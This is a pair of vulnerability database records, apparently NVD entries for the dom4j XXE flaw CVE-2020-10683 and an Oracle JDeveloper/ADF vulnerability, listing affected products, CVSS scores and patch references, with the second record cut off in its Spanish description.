{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:dom4j_project:dom4j:*:*:*:*:*:*:*:*", matchCriteriaId: "1D7F74F1-B9EA-4659-9755-B23F7D747685", versionEndExcluding: "2.0.3", vulnerable: true, }, { criteria: "cpe:2.3:a:dom4j_project:dom4j:*:*:*:*:*:*:*:*", matchCriteriaId: "3C2C95BD-A005-44E2-ACE8-633505485D1B", versionEndExcluding: "2.1.3", versionStartIncluding: "2.1.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*", matchCriteriaId: "D14ABF04-E460-4911-9C6C-B7BCEFE68E9D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", matchCriteriaId: "ED43772F-D280-42F6-A292-7198284D6FE7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "A125E817-F974-4509-872C-B71933F42AD1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "3625D477-1338-46CB-90B1-7291D617DC39", versionEndIncluding: "2.10.0", versionStartIncluding: "2.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DFEFE2C0-7B98-44F9-B3AD-D6EC607E90DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_application_session_controller:3.9m0p1:*:*:*:*:*:*:*", matchCriteriaId: "C6092C11-7779-451C-94F9-24FA2F2010FB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", matchCriteriaId: "526E2FE5-263F-416F-8628-6CD40B865780", versionEndIncluding: "8.2.2", versionStartIncluding: "8.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.0:*:*:*:*:*:*:*", matchCriteriaId: 
"05AD47CC-8A6D-4AEC-B23E-701D3D649CC6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*", matchCriteriaId: "539DA24F-E3E0-4455-84C6-A9D96CD601B3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:data_integrator:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9901F6BA-78D5-45B8-9409-07FF1C6DDD38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:data_integrator:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9FADE563-5AAA-42FF-B43F-35B20A2386C9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:documaker:*:*:*:*:*:*:*:*", matchCriteriaId: "135D531C-A692-4BE3-AB8C-37BB0D35559A", versionEndIncluding: "12.6.4", versionStartIncluding: "12.6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.2.0:*:*:*:*:*:*:*", matchCriteriaId: "7E856B4A-6AE7-4317-921A-35B4D2048652", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_data_quality:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "7DCC2C59-BB9B-4BD2-80A4-33B72737FA10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_data_quality:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "36CF85A9-2C29-46E7-961E-8ADD0B5822CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "021014B2-DC51-481C-BCFE-5857EFBDEDDA", versionEndIncluding: "8.1.0", versionStartIncluding: "8.0.6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_core_banking:11.7.0:*:*:*:*:*:*:*", matchCriteriaId: "87416B3B-3B2B-486B-B931-19199EF07000", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_core_banking:11.8.0:*:*:*:*:*:*:*", matchCriteriaId: "1102B6BC-D99E-4AC0-9375-FB8517A4A71F", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:flexcube_core_banking:11.9.0:*:*:*:*:*:*:*", matchCriteriaId: "4D22386C-FEC4-4984-8E2A-8FE4796BEFBE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_core_banking:11.10.0:*:*:*:*:*:*:*", matchCriteriaId: "B283B614-9E31-4148-8688-B0672B3A77B3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "6329B1A2-75A8-4909-B4FB-77AC7232B6ED", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_empirica_signal:9.0:*:*:*:*:*:*:*", matchCriteriaId: "2051BA9E-E635-47D5-B942-8AC26E9487CB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_information_manager:3.0.1:*:*:*:*:*:*:*", matchCriteriaId: "C666FA96-3809-475C-B68F-29E59BD51959", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:*:*:*:*:*:*:*:*", matchCriteriaId: "48261B54-471D-4C03-AFF9-6F2EA8FA8EBB", versionEndIncluding: "11.3.0", versionStartIncluding: "11.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.0:*:*:*:*:*:*:*", matchCriteriaId: "64D4B80E-2B67-4BDC-9A3A-7BFDA171016A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.4:*:*:*:*:*:*:*", matchCriteriaId: "33E0F28C-1FF3-4E12-AAE4-A765F4F81EC0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2:*:*:*:*:*:*:*", matchCriteriaId: "9A570E5E-A3BC-4E19-BC44-C28D8BC9A537", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:*:*:*:*:*:*:*:*", matchCriteriaId: "5DEAB5CD-4223-4A43-AB9E-486113827A6C", versionEndIncluding: "11.3.0", versionStartIncluding: "11.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2.0:*:*:*:*:*:*:*", matchCriteriaId: "AEDF91E2-E7B5-40EE-B71F-C7D59F4021BD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:10.2.4:*:*:*:*:*:*:*", matchCriteriaId: 
"9A94F93C-5828-4D78-9C48-20AC17E72B8E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_rules_palette:11.0.2:*:*:*:*:*:*:*", matchCriteriaId: "F3E25293-CB03-44CE-A8ED-04B3A0487A6A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "951CE1FD-CBFD-4724-919F-CF9B529F0BA5", versionEndIncluding: "16.2.20.1", versionStartIncluding: "16.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "B89D2BCD-BA96-4DCF-A8B0-59989AD1BC87", versionEndIncluding: "17.12.17.1", versionStartIncluding: "17.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "18CE17D6-FC25-4FDA-AD28-BD8533C7513A", versionEndIncluding: "18.8.19.0", versionStartIncluding: "18.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "5DE19678-FB27-4E29-A7BF-232141D52502", versionEndIncluding: "19.12.6.0", versionStartIncluding: "19.12.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "19A0F1AF-F2E6-44E7-8E2D-190E103B72D3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "6D53690D-3390-4A27-988A-709CD89DD05B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:16.0:*:*:*:*:*:*:*", matchCriteriaId: "CBEEB907-B163-43FF-86DE-4387123DCC4B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*", matchCriteriaId: "A7FBF5C7-EC73-4CE4-8CB7-E9CF5705DB25", 
vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*", matchCriteriaId: "36E16AEF-ACEB-413C-888C-8D250F65C180", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFAEA84-E376-40A2-8C9F-3E0676FEC527", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", matchCriteriaId: "42064F46-3012-4FB1-89BA-F13C2E4CBB6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", matchCriteriaId: "F73E2EFA-0F43-4D92-8C7D-9E66811B76D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*", matchCriteriaId: "EE8CF045-09BB-4069-BCEC-496D5AE3B780", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", matchCriteriaId: "38E74E68-7F19-4EF3-AC00-3C249EAAA39E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:18.0:*:*:*:*:*:*:*", matchCriteriaId: "0783F0D1-8FAC-4BCA-A6F5-C5C60E86D56D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:19.0:*:*:*:*:*:*:*", matchCriteriaId: "BFB0BB58-04D3-409D-AECC-9633782F0E75", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_order_broker:19.1:*:*:*:*:*:*:*", matchCriteriaId: "C7BD0D41-1BED-4C4F-95C8-8987C98908DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:14.0.3:*:*:*:*:*:*:*", matchCriteriaId: "47F3EA56-89AF-4AD5-BA19-D32DBDA087A7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:14.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "0791694C-9B4E-42EA-8F6C-899B43B6D769", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:15.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "312992F0-E65A-4E38-A44C-363A7E157CE4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_price_management:16.0.3.0:*:*:*:*:*:*:*", 
matchCriteriaId: "E1940FD6-39FA-4F92-9625-F215D8051E80", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0.4:*:*:*:*:*:*:*", matchCriteriaId: "78D8F551-8DC8-4510-8350-AE6BC64748DF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0.6:*:*:*:*:*:*:*", matchCriteriaId: "490B2C44-CECD-4551-B04F-4076D0E053C7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0.4:*:*:*:*:*:*:*", matchCriteriaId: "DEC41EB8-73B4-4BDF-9321-F34EC0BAF9E6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0.3:*:*:*:*:*:*:*", matchCriteriaId: "48EFC111-B01B-4C34-87E4-D6B2C40C0122", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3:*:*:*:*:*:*:*", matchCriteriaId: "E55B3AA9-69BE-4136-8C3A-FD0DDCD3FA4B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "51309958-121D-4649-AB9A-EBFA3A49F7CB", versionEndIncluding: "4.3.0.6.0", versionStartIncluding: "4.3.0.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:2.2.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D883EED9-CC64-479D-9C0A-35EB16F43AB4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.2.0.2.0:*:*:*:*:*:*:*", matchCriteriaId: "5435B365-BFF3-4A9E-B45C-42D8F1E20FB7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.2.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1FAC3840-2CF8-44CE-81BB-EEEBDA00A34A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "3F906F04-39E4-4BE4-8A73-9D058AAADB43", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*", matchCriteriaId: "7B393A82-476A-4270-A903-38ED4169E431", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: 
"D7756147-7168-4E03-93EE-31379F6BE88E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "5A502118-5B2B-47AE-82EC-1999BD841103", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", matchCriteriaId: "B620311B-34A3-48A6-82DF-6F078D7A4493", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", matchCriteriaId: "5EC98B22-FFAA-4B59-8E63-EBAA4336AD13", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", matchCriteriaId: "5735E553-9731-4AAC-BCFF-989377F817B3", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*", matchCriteriaId: "9F4754FB-E3EB-454A-AB1A-AE3835C5350C", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:oracle:*:*", matchCriteriaId: "26A2B713-7D6D-420A-93A4-E0D983C983DF", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapmanager:-:*:*:*:*:sap:*:*", matchCriteriaId: "64DE38C8-94F1-4860-B045-F33928F676A8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", matchCriteriaId: "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. 
However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j.", }, { lang: "es", value: "dom4j versiones anteriores a 2.0.3 y versiones 2.1.x anteriores a 2.1.3, permite DTDs y External Entities por defecto, lo que podría permitir ataques de tipo XXE. Sin embargo, existe una documentación externa popular de OWASP que muestra cómo habilitar el comportamiento seguro no predeterminado en cualquier aplicación que use dom4j.", }, ], id: "CVE-2020-10683", lastModified: "2024-11-21T04:55:50.587", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2020-05-01T19:15:12.927", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: 
"https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/issues/87", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3Cdev.velocity.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3Cdev.velocity.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3Cnotifications.freemarker.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://usn.ubuntu.com/4575-1/", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", 
], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00061.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/commit/a8228522a99a02146106672a34c104adbda5c658", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/commits/version-2.0.3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/issues/87", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Release Notes", "Third Party Advisory", ], url: "https://github.com/dom4j/dom4j/releases/tag/version-2.1.3", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r51f3f9801058e47153c0ad9bc6209d57a592fc0e7aefd787760911b8%40%3Cdev.velocity.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r91c64cd51e68e97d524395474eaa25362d564572276b9917fcbf5c32%40%3Cdev.velocity.apache.org%3E", }, 
{ source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rb1b990d7920ae0d50da5109b73b92bab736d46c9788dd4b135cb1a51%40%3Cnotifications.freemarker.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20200518-0002/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://usn.ubuntu.com/4575-1/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-611", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Source | URL | Tags | |
---|---|---|---|
secalert_us@oracle.com | http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html | Patch, Vendor Advisory | |
secalert_us@oracle.com | https://www.oracle.com/security-alerts/cpuapr2020.html | Patch, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | http://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html | Patch, Vendor Advisory | |
af854a3a-2127-422b-91ae-364da2661108 | https://www.oracle.com/security-alerts/cpuapr2020.html | Patch, Vendor Advisory |
Vendor | Product | Version | |
---|---|---|---|
oracle | application_development_framework | 11.1.1.9.0 | |
oracle | application_development_framework | 11.1.2.4.0 | |
oracle | application_development_framework | 12.1.3.0.0 | |
oracle | application_development_framework | 12.2.1.3.0 | |
oracle | jdeveloper | 11.1.1.9.0 | |
oracle | jdeveloper | 11.1.2.4.0 | |
oracle | jdeveloper | 12.1.3.0.0 | |
oracle | jdeveloper | 12.2.1.3.0 | |
oracle | hyperion_financial_management | 11.1.2.4 | |
oracle | peoplesoft_enterprise_scm_purchasing | 9.2 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:application_development_framework:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A5A9C82D-8EFF-4779-9B09-F32D1AC6809E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_development_framework:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "EAE404A6-D8A9-48AE-B906-23F1F4A8D508", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_development_framework:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B25C242F-9D34-4253-ABA2-6445B0E1E61F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:application_development_framework:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "8FA6E182-D9C6-4F97-A51F-CD6A19138BAD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.2.4.0:*:*:*:*:*:*:*", matchCriteriaId: "2B70A973-A5C5-4E51-B93C-C22888E24FF1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:hyperion_financial_management:11.1.2.4:*:*:*:*:*:*:*", matchCriteriaId: "49706536-CE9B-4713-8460-CC961B50C341", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_scm_purchasing:9.2:*:*:*:*:*:*:*", matchCriteriaId: "AFD1EE51-F556-49EE-BDF9-5C189D13F2CD", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Vulnerability in the Oracle JDeveloper and ADF product of Oracle Fusion Middleware (component: OAM). Supported versions that are affected are 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 and 12.2.1.3.0. 
Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle JDeveloper and ADF. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle JDeveloper and ADF accessible data. CVSS 3.0 Base Score 2.4 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N).", }, { lang: "es", value: "Una vulnerabilidad en el producto Oracle JDeveloper and ADF de Oracle Fusion Middleware (componente: OAM). Las versiones compatibles que están afectadas son 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0 y 12.2.1.3.0. Una vulnerabilidad fácilmente explotable permite a un atacante muy privilegiado con acceso a la red por medio de HTTP comprometer a Oracle JDeveloper and ADF. Los ataques con éxito requieren la interacción humana de otra persona diferente del atacante. Los ataques con éxito de esta vulnerabilidad pueden resultar en un acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle JDeveloper and ADF. CVSS 3.0 Puntuación Base 2.4 (Impactos de la Confidencialidad). 
